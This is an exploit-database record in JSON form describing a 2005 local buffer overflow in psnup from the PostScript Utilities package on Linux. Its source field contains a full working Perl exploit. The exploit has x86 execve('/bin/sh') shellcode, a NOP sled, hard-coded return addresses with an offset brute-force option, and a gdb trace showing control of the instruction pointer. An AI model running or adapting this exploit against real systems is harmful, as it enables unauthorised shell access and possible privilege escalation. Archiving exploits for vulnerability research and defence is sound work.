Description
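PostScript Utilities (psutils) - psnup Local Buffer Overflow. The record below covers a local memory-corruption issue in psnup on Linux, reached through an overlong input-file argument on the command line. The author reports testing against psutils-p17 and states that the other utilities in the package are affected as well. The record lists no CVE identifier and no references.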
{"lastseen": "2020-04-01T19:04:43", "references": [], "description": "\nPostScript Utilities - psnup Local Buffer Overflow", "edition": 1, "reporter": "lammat", "exploitpack": {"type": "local", "platform": "linux"}, "published": "2005-03-21T00:00:00", "title": "PostScript Utilities - psnup Local Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-03-21T00:00:00", "id": "EXPLOITPACK:81E0113E4419351DB6A4A66D558C2C61", "href": "", "viewCount": 5, "sourceData": "#!/usr/bin/perl\n\n# PostScript Utilities - psnup (all the utilities of the package are vulnerable) *\n# \t\t\t\t\t\t \t *\t\n# written by lammat just for practice purposes *\n# tested against psutils-p17 *\n# (gdb) r -8 `perl -e 'print \"A\"x250'` *\n# The program being debugged has been started already. *\n# Start it from the beginning? (y or n) y *\n# Starting program: /usr/bin/psnup -8 `perl -e 'print \"A\"x250'` *\n# (no debugging symbols found).../usr/bin/psnup: can't open input file *\n# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... *\n# *\n# Program received signal SIGSEGV, Segmentation fault. * \n# 0x41414141 in ?? 
() * \n\n# execve(/bin/sh) for linux x86\n# 29 bytes\n# by Matias Sedalo\n\n\n$shellcode = \n\"\\x31\\xdb\\x53\\x8d\\x43\\x17\\xcd\\x80\\x99\\x68\\x6e\\x2f\\x73\\x68\\x68\".\n\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\n\n$len = 250;\n$ret = 0xbffff3a0; \n$nop = \"\\x90\";\n$oops=\"/usr/bin/psnup\";\n$offset = 900; \n\n# offset bruteforce purposes below\nif (@ARGV == 1) {\n $offset = $ARGV[0];}\n\nfor ($i=0; $i<($len-length($shellcode)-100);$i++)\n\t{$buffer .= $nop;\n}\n\n$buffer .= $shellcode;\n\nprint (\"Address: 0x\",sprintf('%lx',($ret + $offset)),\"\\n\");\n\n$new_ret = pack('l',($ret + $offset));\n\nuntil(length($buffer)==$len)\n{\n$buffer.=$new_ret;\n}\nexec(\"$oops -8 $buffer\");\n\n# milw0rm.com [2005-03-21]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645840388, "score": 1659814272}, "_internal": {"score_hash": "41d3b5ee27c497fca077f2aa61b95d0e"}}
{}